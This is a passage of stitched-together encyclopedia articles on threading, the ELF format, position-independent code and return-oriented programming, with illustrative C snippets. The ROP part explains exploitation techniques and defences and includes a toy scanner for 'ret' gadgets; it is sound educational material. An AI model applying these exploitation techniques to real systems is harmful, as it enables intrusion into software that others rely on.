One of the major drawbacks, however, is that it cannot benefit from the hardware acceleration onmultithreadedprocessors ormulti-processorcomputers: there is never more than one thread being scheduled at the same time.[9]For example, if one of the threads needs to execute an I/O request, the whole process is blocked and the threading advantage cannot be used. TheGNU Portable Threadsuses user-level threading, as doesState Threads. M:Nmaps someMnumber of application threads onto someNnumber of kernel entities,[9]or "virtual processors." This is a compromise between kernel-level ("1:1") and user-level ("N:1") threading. In general, "M:N" threading systems are more complex to implement than either kernel or user threads, because changes to both kernel and user-space code are required. In the M:N implementation, the threading library is responsible for scheduling user threads on the available schedulable entities; this makes context switching of threads very fast, as it avoids system calls. However, this increases complexity and the likelihood ofpriority inversion, as well as suboptimal scheduling without extensive (and expensive) coordination between the userland scheduler and the kernel scheduler. SunOS4.x implementedlight-weight processesor LWPs.NetBSD2.x+ andDragonFly BSDimplement LWPs as kernel threads (1:1 model). SunOS 5.2 through SunOS 5.8 as well as NetBSD 2 to NetBSD 4 implemented a two level model, multiplexing one or more user level threads on each kernel thread (M:N model). SunOS 5.9 and later, as well as NetBSD 5 eliminated user threads support, returning to a 1:1 model.[10]FreeBSD 5 implemented the M:N model. FreeBSD 6 supported both 1:1 and M:N, and users could choose which one should be used with a given program using /etc/libmap.conf. Starting with FreeBSD 7, the 1:1 model became the default. FreeBSD 8 no longer supports the M:N model. Incomputer programming,single-threadingis the processing of oneinstructionat a time.[11]In the formal analysis of the variables'semanticsand process state, the termsingle threadingcan be used differently to mean "backtracking within a single thread", which is common in thefunctional programmingcommunity.[12] Multithreading is mainly found in multitasking operating systems. Multithreading is a widespread programming and execution model that allows multiple threads to exist within the context of one process. These threads share the process's resources, but are able to execute independently. The threaded programming model provides developers with a useful abstraction of concurrent execution. Multithreading can also be applied to one process to enableparallel executionon amultiprocessingsystem. Multithreading libraries tend to provide a function call to create a new thread, which takes a function as a parameter. A concurrent thread is then created which starts running the passed function and ends when the function returns. The thread libraries also offer data synchronization functions. Threads in the same process share the same address space. This allows concurrently running code tocoupletightly and conveniently exchange data without the overhead or complexity of anIPC. When shared between threads, however, even simple data structures become prone torace conditionsif they require more than one CPU instruction to update: two threads may end up attempting to update the data structure at the same time and find it unexpectedly changing underfoot. Bugs caused by race conditions can be very difficult to reproduce and isolate. 
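The lost-update race described above can be reproduced in a few lines (POSIX threads assumed; compile with -pthread). The iteration counts are arbitrary, but on most hardware the final value falls well short of the expected total.

/* Demonstrates a race: two threads increment a shared counter without
   synchronization, so increments are lost and the final value is usually
   well below 2,000,000. */
#include <pthread.h>
#include <stdio.h>

static long counter = 0;                  /* shared, unsynchronized */

static void *bump(void *arg) {
    (void)arg;
    for (int i = 0; i < 1000000; i++)
        counter++;                        /* read-modify-write: not atomic */
    return NULL;
}

int main(void) {
    pthread_t a, b;
    pthread_create(&a, NULL, bump, NULL);
    pthread_create(&b, NULL, bump, NULL);
    pthread_join(a, NULL);
    pthread_join(b, NULL);
    printf("counter = %ld (expected 2000000)\n", counter);
    return 0;
}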
To prevent this, threadingapplication programming interfaces(APIs) offersynchronization primitivessuch asmutexestolockdata structures against concurrent access. On uniprocessor systems, a thread running into a locked mutex must sleep and hence trigger a context switch. On multi-processor systems, the thread may instead poll the mutex in aspinlock. Both of these may sap performance and force processors insymmetric multiprocessing(SMP) systems to contend for the memory bus, especially if thegranularityof the locking is too fine. Other synchronization APIs includecondition variables,critical sections,semaphores, andmonitors. A popular programming pattern involving threads is that ofthread poolswhere a set number of threads are created at startup that then wait for a task to be assigned. When a new task arrives, an idle thread wakes up, completes the task, and goes back to waiting. This avoids the relatively expensive thread creation and destruction functions for every task performed and takes thread management out of the application developer's hands and leaves it to a library or the operating system that is better suited to optimize thread management. Multithreading offers both advantages and drawbacks relative to a single-threaded design. Many programming languages support threading in some capacity.
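A mutex-protected version of the shared-counter update, echoing the synchronization primitives described above (again POSIX threads, purely as an illustration):

/* The same shared counter, now protected by a mutex so no increments are lost. */
#include <pthread.h>
#include <stdio.h>

static long counter = 0;
static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

static void *bump(void *arg) {
    (void)arg;
    for (int i = 0; i < 1000000; i++) {
        pthread_mutex_lock(&lock);       /* serialize access to the shared data */
        counter++;
        pthread_mutex_unlock(&lock);
    }
    return NULL;
}

int main(void) {
    pthread_t a, b;
    pthread_create(&a, NULL, bump, NULL);
    pthread_create(&b, NULL, bump, NULL);
    pthread_join(a, NULL);
    pthread_join(b, NULL);
    printf("counter = %ld\n", counter);   /* reliably 2000000 */
    return 0;
}

The cost is that the two threads now serialize on the lock, which is exactly the granularity concern mentioned earlier.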
https://en.wikipedia.org/wiki/Thread_(computing)
Incomputing, theExecutable and Linkable Format[2](ELF, formerly namedExtensible Linking Format) is a common standardfile formatforexecutablefiles,object code,shared libraries, andcore dumps. First published in the specification for theapplication binary interface(ABI) of theUnixoperating system version namedSystem V Release 4(SVR4),[3]and later in the Tool Interface Standard,[1]it was quickly accepted among different vendors ofUnixsystems. In 1999, it was chosen as the standard binary file format for Unix andUnix-likesystems onx86processors by the86openproject. By design, the ELF format is flexible, extensible, andcross-platform. For instance, it supports differentendiannessesand address sizes so it does not exclude any particularCPUorinstruction set architecture. This has allowed it to be adopted by many differentoperating systemson many different hardwareplatforms. Each ELF file is made up of one ELF header, followed by file data. The data can include a program header table (describing zero or more segments), a section header table (describing zero or more sections), and the data referred to by entries in those tables. The segments contain information that is needed forrun timeexecution of the file, while sections contain important data for linking and relocation. Anybytein the entire file can be owned by one section at most, and orphan bytes can occur which are unowned by any section. The ELF header defines whether to use32-bitor64-bitaddresses. The header contains three fields that are affected by this setting and offset other fields that follow them. The ELF header is 52 or 64 bytes long for 32-bit and 64-bit binaries, respectively. glibc 2.12+ in casee_ident[EI_OSABI] == 3treats thee_ident[EI_ABIVERSION]field as the ABI version of thedynamic linker:[6]it defines a list of dynamic linker's features,[7]treatse_ident[EI_ABIVERSION]as a feature level requested by the shared object (executable or dynamic library) and refuses to load it if an unknown feature is requested, i.e.e_ident[EI_ABIVERSION]is greater than the largest known feature.[8] The program header table tells the system how to create a process image. It is found at file offsete_phoff, and consists ofe_phnumentries, each with sizee_phentsize. The layout is slightly different in32-bitELF vs64-bitELF, because thep_flagsare in a different structure location for alignment reasons. Each entry describes one segment, giving its type, flags, file offset, virtual address, and file and memory sizes. The ELF format has replaced older executable formats in various environments. It has replaceda.outandCOFFformats inUnix-likeoperating systems. ELF has also seen some adoption in non-Unix operating systems.Microsoft Windowsalso uses the ELF format, but only for itsWindows Subsystem for Linuxcompatibility system.[17] Some game consoles, other (operating) systems running on PowerPC, and some operating systems for mobile phones and mobile devices also use ELF. Some phones can run ELF files through the use of a patch that adds assembly code to the main firmware, which is a feature known asELFPackin the underground modding culture. The ELF file format is also used with theAtmel AVR(8-bit), AVR32[22]and with Texas Instruments MSP430 microcontroller architectures. Some implementations of Open Firmware can also load ELF files, most notably Apple's implementation used in almost all PowerPC machines the company produced. 
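The header fields discussed above can be read directly with the structures from <elf.h> on Linux/glibc systems; the following sketch assumes a 64-bit ELF file for brevity and only prints a few identification and program-header-table fields.

/* Reads an ELF file's identification bytes and locates its program header
   table, using the structures from <elf.h>. 64-bit ELF assumed for brevity. */
#include <elf.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
    if (argc != 2) { fprintf(stderr, "usage: %s <elf-file>\n", argv[0]); return 1; }

    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror("fopen"); return 1; }

    Elf64_Ehdr eh;
    if (fread(&eh, sizeof eh, 1, f) != 1) { fprintf(stderr, "short read\n"); return 1; }

    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0) {   /* 0x7f 'E' 'L' 'F' */
        fprintf(stderr, "not an ELF file\n");
        return 1;
    }

    printf("class   : %s\n", eh.e_ident[EI_CLASS] == ELFCLASS64 ? "64-bit" : "32-bit");
    printf("data    : %s-endian\n",
           eh.e_ident[EI_DATA] == ELFDATA2LSB ? "little" : "big");
    printf("type    : %u  machine: %u\n", eh.e_type, eh.e_machine);
    printf("program header table: offset %llu, %u entries of %u bytes\n",
           (unsigned long long)eh.e_phoff, eh.e_phnum, eh.e_phentsize);

    fclose(f);
    return 0;
}

The standard readelf -h and readelf -l commands print the same information for either ELF class.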
86openwas a project to form consensus on a common binary file format for Unix and Unix-like operating systems on the common PC compatible x86 architecture, to encourage software developers to port to the architecture.[24]The initial idea was to standardize on a small subset of Spec 1170, a predecessor of the Single UNIX Specification, and the GNU C Library (glibc) to enable unmodified binaries to run on the x86 Unix-like operating systems. The project was originally designated "Spec 150". The format eventually chosen was ELF, specifically the Linux implementation of ELF, after it had turned out to be ade factostandard supported by all involved vendors and operating systems. The group began email discussions in 1997 and first met together at the Santa Cruz Operation offices on August 22, 1997. The steering committee was Marc Ewing, Dion Johnson, Evan Leibovitch,Bruce Perens, Andrew Roach, Bryan Wayne Sparks and Linus Torvalds. Other people on the project were Keith Bostic, Chuck Cranor, Michael Davidson, Chris G. Demetriou, Ulrich Drepper, Don Dugger, Steve Ginzburg, Jon "maddog" Hall, Ron Holt, Jordan Hubbard, Dave Jensen, Kean Johnston, Andrew Josey, Robert Lipe, Bela Lubkin, Tim Marsland, Greg Page, Ronald Joe Record, Tim Ruckle, Joel Silverstein, Chia-pi Tien, and Erik Troan. Operating systems and companies represented were BeOS, BSDI, FreeBSD,Intel, Linux, NetBSD, SCO and SunSoft. The project progressed and in mid-1998, SCO began developing lxrun, an open-source compatibility layer able to run Linux binaries on OpenServer, UnixWare, and Solaris. SCO announced official support of lxrun at LinuxWorld in March 1999. Sun Microsystems began officially supporting lxrun for Solaris in early 1999,[25]and later moved to integrated support of the Linux binary format via Solaris Containers for Linux Applications. With the BSDs having long supported Linux binaries (through a compatibility layer) and the main x86 Unix vendors having added support for the format, the project decided that Linux ELF was the format chosen by the industry and "declare[d] itself dissolved" on July 25, 1999.[26] FatELF is an ELF binary-format extension that adds fat binary capabilities.[27]It is aimed at Linux and other Unix-like operating systems. In addition to the CPU architecture abstraction (byte order, word size,CPUinstruction set etc.), there is the potential advantage of software-platform abstraction e.g., binaries which support multiple kernel ABI versions. As of 2021, FatELF has not been integrated into the mainline Linux kernel.[28][29][30]
https://en.wikipedia.org/wiki/Executable_and_linkable_format
Incomputing,position-independent code[1](PIC[1]) orposition-independent executable(PIE)[2]is a body ofmachine codethat executes properly regardless of itsmemory address.[a]PIC is commonly used forshared libraries, so that the same library code can be loaded at a location in each program's address space where it does not overlap with other memory in use by, for example, other shared libraries. PIC was also used on older computer systems that lacked anMMU,[3]so that theoperating systemcould keep applications away from each other even within the singleaddress spaceof an MMU-less system. Position-independent code can be executed at any memory address without modification. This differs from absolute code,[1]which must be loaded at a specific location to function correctly,[1]andload-time locatable(LTL) code,[1]in which alinkerorprogram loadermodifies a program before execution, so it can be run only from a particular memory location.[1]The latter terms are sometimes referred to asposition-dependent code.[4]Generating position-independent code is often the default behavior forcompilers, but they may place restrictions on the use of some language features, such as disallowing use of absolute addresses (position-independent code has to userelative addressing). Instructions that refer directly to specific memory addresses sometimes execute faster, and replacing them with equivalent relative-addressing instructions may result in slightly slower execution, although modern processors make the difference practically negligible.[5] In early computers such as theIBM 701[6](29 April 1952) or theUNIVAC I(31 March 1951) code was not position-independent: each program was built to load into and run from a particular address. Those early computers did not have an operating system and were not multitasking-capable. Programs were loaded into main storage (or even stored on magnetic drum for execution directly from there) and run one at a time. In such an operational context, position-independent code was not necessary. Even onbase and bounds[b]systems such as theCDC 6600, theGE 625and theUNIVAC 1107, once the OS loaded code into a job's storage, it could only run from the relative address at which it was loaded. Burroughsintroduced asegmentedsystem, theB5000(1961), in which programs addressed segments indirectly via control words on thestackor in the program reference table (PRT); a shared segment could be addressed via different PRT locations in different processes. Similarly, on the laterB6500, all segment references were via positions in astack frame. TheIBM System/360(7 April 1964) was designed withtruncated addressingsimilar to that of theUNIVAC III,[7]with code position independence in mind. In truncated addressing, memory addresses are calculated from abase registerand an offset. At the beginning of a program, the programmer must establishaddressabilityby loading a base register; normally, the programmer also informs the assembler with aUSINGpseudo-op. The programmer can load the base register from a register known to contain the entry point address, typically R15, or can use theBALR (Branch And Link, Register form)instruction (with a R2 Value of 0) to store the next sequential instruction's address into the base register, which was then coded explicitly or implicitly in each instruction that referred to a storage location within the program. Multiple base registers could be used, for code or for data. 
Such instructions require less memory because they do not have to hold a full 24, 31, 32, or 64 bit address (4 or 8 bytes), but instead a base register number (encoded in 4 bits) and a 12–bit address offset (encoded in 12 bits), requiring only two bytes. This programming technique is standard on IBM S/360 type systems. It has been in use through to today's IBM System/z. When coding in assembly language, the programmer has to establish addressability for the program as described above and also use other base registers for dynamically allocated storage. Compilers automatically take care of this kind of addressing. IBM's early operating systemDOS/360(1966) did not use virtual storage (since the early models of System S/360 did not support it), but it did have the ability to place programs at an arbitrary (or automatically chosen) storage location during loading via the PHASE name,*JCL (Job Control Language)statement. So, on S/360 systems without virtual storage, a program could be loaded at any storage location, but this required a contiguous memory area large enough to hold that program. Sometimesmemory fragmentationwould occur from loading and unloading differently sized modules. Virtual storage - by design - does not have that limitation. While DOS/360 andOS/360did not support PIC, transientSVC routinesin OS/360 could not contain relocatable address constants and could run in any of the transient areas withoutrelocation. IBM first introduced virtual storage onIBM System/360 model 67in 1965 to support IBM's first multi-tasking, time-sharing operating system, TSS/360. Later versions of DOS/360 (DOS/VS etc.) and later IBM operating systems all utilized virtual storage. Truncated addressing remained part of the base architecture and is still advantageous when multiple modules must be loaded into the same virtual address space. By way of comparison, on earlysegmentedsystems such asBurroughs MCPon theBurroughs B5000(1961) andMultics(1964), and on paging systems such as IBMTSS/360(1967)[c], code was also inherently position-independent, since subroutine virtual addresses in a program were located in private data external to the code, e.g., program reference table, linkage segment, prototype section. The invention of dynamic address translation (the function provided by anMMU) originally reduced the need for position-independent code because every process could have its own independentaddress space(range of addresses). However, multiple simultaneous jobs using the same code created a waste of physical memory. If two jobs run entirely identical programs, dynamic address translation provides a solution by allowing the system simply to map the same virtual address (for example, address 32K) in two different jobs' address spaces to the same bytes of real memory, containing the single copy of the program. Different programs may share common code. For example, the payroll program and the accounts receivable program may both contain an identical sort subroutine. A shared module (a shared library is a form of shared module) gets loaded once and mapped into the two address spaces. Procedure calls inside a shared library are typically made through small procedure linkage table (PLT)stubs, which then call the definitive function. This notably allows a shared library to inherit certain function calls from previously loaded libraries rather than using its own versions.[8] Data references from position-independent code are usually made indirectly, throughGlobal Offset Tables(GOTs), which store the addresses of all accessedglobal variables. 
There is one GOT per compilation unit or object module, and it is located at a fixed offset from the code (although this offset is not known until the library islinked). When alinkerlinks modules to create a shared library, it merges the GOTs and sets the final offsets in code. It is not necessary to adjust the offsets when loading the shared library later.[8] Position-independent code that accesses global data does so by fetching the address for the global variable from its entry in the GOT. As the GOT is at a fixed offset from the code, the offset between the address of a given instruction in the code and the address of a GOT entry for a given global variable is also fixed, so that the offset does not need to be changed depending on the address at which the position-independent code is loaded. An instruction that fetches the GOT entry for a global variable would use anaddressing modethat contains an offset relative to some instruction in the code; this might be aPC-relativeaddressing mode if theinstruction set architecturesupports it, or aregister-relativeaddressing mode, with functions loading that register with the address of an instruction in thefunction prologue.[8][9][10][11] Dynamic-link libraries(DLLs) inMicrosoft Windowsuse variant E8 of the CALL instruction (Call near, relative, displacement relative to next instruction). These instructions do not need modification when the DLL is loaded. Some global variables (e.g. arrays of string literals, virtual function tables) are expected to contain an address of an object in data section respectively in code section of the dynamic library; therefore, the stored address in the global variable must be updated to reflect the address where the DLL was loaded to. The dynamic loader calculates the address referred to by a global variable and stores the value in such global variable; this triggers copy-on-write of a memory page containing such global variable. Pages with code and pages with global variables that do not contain pointers to code or global data remain shared between processes. This operation must be done in any OS that can load a dynamic library at arbitrary address. In Windows Vista and later versions of Windows, therelocationof DLLs and executables is done by the kernel memory manager, which shares the relocated binaries across multiple processes. Images are always relocated from their preferred base addresses, achievingaddress space layout randomization(ASLR).[12] Versions of Windows prior to Vista require that system DLLs beprelinkedat non-conflicting fixed addresses at the link time in order to avoid runtime relocation of images. Runtime relocation in these older versions of Windows is performed by the DLL loader within the context of each process, and the resulting relocated portions of each image can no longer be shared between processes. The handling of DLLs in Windows differs from the earlierOS/2procedure it derives from. OS/2 presents a third alternative and attempts to load DLLs that are not position-independent into a dedicated "shared arena" in memory, and maps them once they are loaded. All users of the DLL are able to use the same in-memory copy. InMulticseach procedure conceptually[d]has a code segment and a linkage segment.[13][14]The code segment contains only code and the linkage section serves as a template for a new linkage segment. Pointer register 4 (PR4) points to the linkage segment of the procedure. 
A call to a procedure saves PR4 in the stack before loading it with a pointer to the callee's linkage segment. The procedure call uses an indirect pointer pair[15]with a flag to cause a trap on the first call so that the dynamic linkage mechanism can add the new procedure and its linkage segment to the Known Segment Table (KST), construct a new linkage segment, put their segment numbers in the caller's linkage section and reset the flag in the indirect pointer pair. In IBM S/360 Time Sharing System (TSS/360 and TSS/370) each procedure may have a read-only public CSECT and a writable private Prototype Section (PSECT). A caller loads a V-constant for the routine into General Register 15 (GR15) and copies an R-constant for the routine's PSECT into the 19th word of the save area pointed to by GR13.[16] The Dynamic Loader[17]does not load program pages or resolve address constants until the first page fault. Position-independent executables(PIE) are executable binaries made entirely from position-independent code. While some systems only run PIC executables, there are other reasons they are used. PIE binaries are used in somesecurity-focusedLinuxdistributions to allowPaXorExec Shieldto useaddress space layout randomization(ASLR) to prevent attackers from knowing where existing executable code is during a security attack usingexploitsthat rely on knowing the offset of the executable code in the binary, such asreturn-to-libc attacks. (The official Linux kernel since 2.6.12 of 2005 has a weaker ASLR that also works with PIE. It is weak in that randomness is applied to whole ELF file units.)[18] Apple'smacOSandiOSfully support PIE executables as of versions 10.7 and 4.3, respectively; a warning is issued when non-PIE iOS executables are submitted for approval to Apple's App Store but there is no hard requirement yet and non-PIE applications are not rejected.[19][20] OpenBSDhas PIE enabled by default on most architectures since OpenBSD 5.3, released on 1 May 2013.[21]Support for PIE instatically linkedbinaries, such as the executables in/binand/sbindirectories, was added near the end of 2014.[22]openSUSE added PIE as a default in February 2015. Beginning withFedora23, Fedora maintainers decided to build packages with PIE enabled as the default.[23]Ubuntu17.10has PIE enabled by default across all architectures.[24]Gentoo's new profiles now support PIE by default.[25]Around July 2017,Debianenabled PIE by default.[26] Androidenabled support for PIEs inJelly Bean[27]and removed non-PIE linker support inLollipop.[28]
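As a concrete illustration of the GOT-based data access described earlier, the following tiny source file is the kind of code that gets compiled into a shared library with position independence enabled; the build command and the assembly shown in the comment are typical of gcc/clang on x86-64 but vary by compiler, options, and architecture.

/* pic_example.c - a tiny shared-library source file. Built position-independent,
   for example:  cc -fPIC -shared pic_example.c -o libpic_example.so
   On x86-64, a compiler typically reaches 'shared_counter' through the GOT with
   a PC-relative load along the lines of:
       movq shared_counter@GOTPCREL(%rip), %rax
       movl (%rax), %eax
   so the emitted code contains no absolute addresses and can be mapped at any
   base address. (Exact instructions depend on the compiler and options.) */

int shared_counter;            /* global data, reached indirectly via the GOT */

int get_counter(void) {
    return shared_counter;
}

void bump_counter(void) {
    shared_counter++;
}

An executable built the same way with -fPIE and linked with -pie is what the PIE-by-default distributions listed above ship.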
https://en.wikipedia.org/wiki/Position-independent_code
Return-oriented programming(ROP) is acomputer security exploittechnique that allows an attacker to execute code in the presence of security defenses[1][2]such asexecutable-space protectionandcode signing.[3] In this technique, an attacker gains control of thecall stackto hijack programcontrol flowand then executes carefully chosenmachine instructionsequences that are already present in the machine's memory, called "gadgets".[4][nb 1]Each gadget typically ends in areturn instructionand is located in asubroutinewithin the existing program and/or shared library code.[nb 1]Chained together, these gadgets allow an attacker to perform arbitrary operations on a machine employing defenses that thwart simpler attacks. Return-oriented programming is an advanced version of astack smashingattack. Generally, these types of attacks arise when an adversary manipulates thecall stackby taking advantage of abugin the program, often abuffer overrun. In a buffer overrun, a function that does not perform properbounds checkingbefore storing user-provided data into memory will accept more input data than it can store properly. If the data is being written onto the stack, the excess data may overflow the space allocated to the function's local variables and overwrite the return address. This address will later be used by the function to redirect control flow back to thecaller. If it has been overwritten, control flow will be diverted to the location specified by the new return address. In a standard buffer overrun attack, the attacker would simplywrite attack code(the "payload") onto the stack and then overwrite the return address with the location of these newly written instructions. Until the late 1990s, majoroperating systemsdid not offer any protection against these attacks;Microsoft Windowsprovided no buffer-overrun protections until 2004.[5]Eventually, operating systems began to combat the exploitation of buffer overflow bugs by marking the memory where data is written as non-executable, a technique known asexecutable-space protection. With this enabled, the machine would refuse to execute any code located in user-writable areas of memory, preventing the attacker from placing a payload on the stack and jumping to it via a return address overwrite.Hardware supportlater became available to strengthen this protection. With data execution prevention, an adversary cannot directly execute instructions written to a buffer because the buffer's memory section is marked as non-executable. To defeat this protection, a return-oriented programming attack does not inject malicious instructions, but rather uses instruction sequences already present in executable memory, called "gadgets", by manipulating return addresses. A typical data execution prevention implementation cannot defend against this attack because the adversary did not directly execute the malicious code, but rather combined sequences of "good" instructions by changing stored return addresses; therefore the code used would be marked as executable. The widespread implementation of data execution prevention made traditional buffer overflow vulnerabilities difficult or impossible to exploit in the manner described above. Instead, an attacker was restricted to code already in memory marked executable, such as the program code itself and any linkedshared libraries. 
Since shared libraries, such aslibc, often contain subroutines for performing system calls and other functionality potentially useful to an attacker, they are the most likely candidates for finding code to assemble an attack. In a return-into-library attack, an attacker hijacks program control flow by exploiting a buffer overrun vulnerability, exactly as discussed above. Instead of attempting to write an attack payload onto the stack, the attacker instead chooses an available library function and overwrites the return address with its entry location. Further stack locations are then overwritten, obeying applicablecalling conventions, to carefully pass the proper parameters to the function so it performs functionality useful to the attacker. This technique was first presented bySolar Designerin 1997,[6]and was later extended to unlimited chaining of function calls.[7] The rise of64-bit x86processors brought with it a change to the subroutine calling convention that required the first few arguments to a function to be passed inregistersinstead of on the stack. This meant that an attacker could no longer set up a library function call with desired arguments just by manipulating the call stack via a buffer overrun exploit. Shared library developers also began to remove or restrict library functions that performed actions particularly useful to an attacker, such assystem callwrappers. As a result, return-into-library attacks became much more difficult to mount successfully. The next evolution came in the form of an attack that used chunks of library functions, instead of entire functions themselves, to exploit buffer overrun vulnerabilities on machines with defenses against simpler attacks.[8]This technique looks for functions that contain instruction sequences that pop values from the stack into registers. Careful selection of these code sequences allows an attacker to put suitable values into the proper registers to perform a function call under the new calling convention. The rest of the attack proceeds as a return-into-library attack. Return-oriented programming builds on the borrowed code chunks approach and extends it to provideTuring-completefunctionality to the attacker, includingloopsandconditional branches.[9][10]Put another way, return-oriented programming provides a fully functional "language" that an attacker can use to make a compromised machine perform any operation desired.Hovav Shachampublished the technique in 2007[11]and demonstrated how all the important programming constructs can be simulated using return-oriented programming against a target application linked with the C standard library and containing an exploitable buffer overrun vulnerability. A return-oriented programming attack is superior to the other attack types discussed, both in expressive power and in resistance to defensive measures. None of the counter-exploitation techniques mentioned above, including removing potentially dangerous functions from shared libraries altogether, are effective against a return-oriented programming attack. Although return-oriented programming attacks can be performed on a variety of architectures,[11]Shacham's paper and the majority of follow-up work focus on the Intelx86architecture. The x86 architecture is a variable-lengthCISCinstruction set. Return-oriented programming on the x86 takes advantage of the fact that the instruction set is very "dense", that is, any random sequence of bytes is likely to be interpretable as some valid set of x86 instructions. 
It is therefore possible to search for anopcodethat alters control flow, most notably the return instruction (0xC3) and then look backwards in the binary for preceding bytes that form possibly useful instructions. These sets of instruction "gadgets" can then be chained by overwriting the return address, via a buffer overrun exploit, with the address of the first instruction of the first gadget. The first address of subsequent gadgets is then written successively onto the stack. At the conclusion of the first gadget, a return instruction will be executed, which will pop the address of the next gadget off the stack and jump to it. At the conclusion of that gadget, the chain continues with the third, and so on. By chaining the small instruction sequences, an attacker is able to produce arbitrary program behavior from pre-existing library code. Shacham asserts that given any sufficiently large quantity of code (including, but not limited to, the C standard library), sufficient gadgets will exist for Turing-complete functionality.[11] An automated tool has been developed to help automate the process of locating gadgets and constructing an attack against a binary.[12]This tool, known as ROPgadget, searches through a binary looking for potentially useful gadgets, and attempts to assemble them into an attack payload that spawns a shell to accept arbitrary commands from the attacker. Theaddress space layout randomizationalso has vulnerabilities. According to the paper of Shacham et al.,[13]the ASLR on 32-bit architectures is limited by the number of bits available for address randomization. Only 16 of the 32 address bits are available for randomization, and 16 bits of address randomization can be defeated by brute force attack in minutes. 64-bit architectures are more robust, with 40 of the 64 bits available for randomization. A brute force attack against 40-bit randomization is possible, but is unlikely to go unnoticed.[citation needed]In addition to brute force attacks, techniques forremoving randomizationexist. Even with perfect randomization, if there is any information leakage of memory contents it would help to calculate the base address of for example ashared libraryat runtime.[14] According to the paper of Checkoway et al.,[15]it is possible to perform return-oriented-programming on x86 and ARM architectures without using a return instruction (0xC3 on x86). They instead used carefully crafted instruction sequences that already exist in the machine's memory to behave like a return instruction. A return instruction has two effects: firstly, it reads the four-byte value at the top of the stack, and sets the instruction pointer to that value, and secondly, it increases the stack pointer value by four (equivalent to a pop operation). On the x86 architecture, sequences of jmp and pop instructions can act as a return instruction. On ARM, sequences of load and branch instructions can act as a return instruction. Since this new approach does not use a return instruction, it has negative implications for defense. When a defense program checks not only for several returns but also for several jump instructions, this attack may be detected. The G-Free technique was developed by Kaan Onarlioglu, Leyla Bilge, Andrea Lanzi, Davide Balzarotti, and Engin Kirda. It is a practical solution against any possible form of return-oriented programming. 
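The backward search for the ret opcode described earlier can be sketched as a toy scan over a byte buffer; the byte string below is made up for illustration, and a real tool such as ROPgadget additionally disassembles, filters, and chains the candidates it finds.

/* Toy gadget scan: look for the x86 'ret' opcode (0xC3) in a byte buffer and
   print the preceding bytes as a candidate gadget. */
#include <stdio.h>
#include <stddef.h>

static void scan_for_gadgets(const unsigned char *code, size_t len, size_t window) {
    for (size_t i = 0; i < len; i++) {
        if (code[i] != 0xC3)                  /* not a ret */
            continue;
        size_t start = i >= window ? i - window : 0;
        printf("candidate gadget ending at offset 0x%zx:", i);
        for (size_t j = start; j <= i; j++)
            printf(" %02x", code[j]);
        printf("\n");
    }
}

int main(void) {
    /* A made-up byte string standing in for a loaded code region. */
    const unsigned char fake_text[] = {
        0x55, 0x48, 0x89, 0xe5, 0x58, 0xc3,   /* push rbp; mov rbp,rsp; pop rax; ret */
        0x90, 0x5f, 0x5e, 0xc3,               /* nop; pop rdi; pop rsi; ret */
        0x31, 0xc0, 0xc9, 0xc3                /* xor eax,eax; leave; ret */
    };
    scan_for_gadgets(fake_text, sizeof fake_text, 4);
    return 0;
}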
The solution eliminates all unaligned free-branch instructions (instructions like RET or CALL which attackers can use tochange controlflow) inside a binary executable, and protects the free-branch instructions from being used by an attacker. The way G-Free protects the return address is similar to theXOR canaryimplemented by StackGuard. Further, it checks the authenticity of function calls by appending a validation block. If the expected result is not found, G-Free causes the application to crash.[16] A number of techniques have been proposed to subvert attacks based on return-oriented programming.[17]Most rely on randomizing the location of program and library code, so that an attacker cannot accurately predict the location of instructions that might be useful in gadgets and therefore cannot mount a successful return-oriented programming attack chain. One fairly common implementation of this technique,address space layout randomization(ASLR), loads shared libraries into a different memory location at each program load. Although widely deployed by modern operating systems, ASLR is vulnerable toinformation leakageattacks and other approaches to determine the address of any known library function in memory. If an attacker can successfully determine the location of one known instruction, the position of all others can be inferred and a return-oriented programming attack can be constructed. This randomization approach can be taken further by relocating all the instructions and/or other program state (registers and stack objects) of the program separately, instead of just library locations.[18][19][20]This requires extensive runtime support, such as a software dynamic translator, to piece the randomized instructions back together at runtime. This technique is successful at making gadgets difficult to find and utilize, but comes with significant overhead. Another approach, taken by kBouncer, modifies the operating system to verify that return instructions actually divert control flow back to a location immediately following a call instruction. This prevents gadget chaining, but carries a heavy performance penalty, and is not effective against jump-oriented programming attacks which alter jumps and other control-flow-modifying instructions instead of returns.[21] Some modern systems such as Cloud Lambda (FaaS) and IoT remote updates use Cloud infrastructure to perform on-the-fly compilation beforesoftware deployment. A technique that introduces variations to each instance of an executing software program can dramatically increase software's immunity to ROP attacks. Brute forcing Cloud Lambda may result in attacking several instances of the randomized software which reduces the effectiveness of the attack. Asaf Shelly published the technique in 2017[22]and demonstrated the use of Binary Randomization in a software update system. For every updated device, the cloud-based service introduced variations to the code, performed online compilation, and dispatched the binary. This technique is very effective because ROP attacks rely on knowledge of the internal structure of the software. The drawback of the technique is that the software is never fully tested before it is deployed because it is not feasible to test all variations of the randomized software. This means that many Binary Randomization techniques are applicable for network interfaces and system programming and are less recommended for complex algorithms. 
Structured Exception HandlerOverwrite Protection is a feature of Windows which protects against the most common stack overflow attacks, especially against attacks on a structured exception handler. As small embedded systems are proliferating due to the expansion of theInternet Of Things, the need for protection of such embedded systems is also increasing. Using Instruction Based Memory Access Control (IB-MAC) implemented in hardware, it is possible to protect low-cost embedded systems against malicious control flow and stack overflow attacks. The protection can be provided by separating the data stack and the return stack. However, due to the lack of amemory management unitin some embedded systems, the hardware solution cannot be applied to all embedded systems.[23] In 2010, Jinku Li et al. proposed[24]that a suitably modified compiler could eliminate return-oriented "gadgets" by replacing eachcallfwith the instruction sequencepushl$index;jmpfand eachretwith the instruction sequencepopl%reg;jmptable(%reg), wheretablerepresents an immutable tabulation of all "legitimate" return addresses in the program andindexrepresents a specific index into that table.[24]: 5–6This prevents the creation of a return-oriented gadget that returns straight from the end of a function to an arbitrary address in the middle of another function; instead, gadgets can return only to "legitimate" return addresses, which drastically increases the difficulty of creating useful gadgets. Li et al. claimed that "our return indirection technique essentiallyde-generalizesreturn-oriented programming back to the old style of return-into-libc."[24]Their proof-of-concept compiler included apeephole optimizationphase to deal with "certain machine instructions which happen to contain the return opcode in their opcodes or immediate operands,"[24]such asmovl$0xC3,%eax. The ARMv8.3-A architecture introduces a new feature at the hardware level that takes advantage of unused bits in the pointer address space to cryptographically sign pointer addresses using a specially-designedtweakable block cipher[25][26]which signs the desired value (typically, a 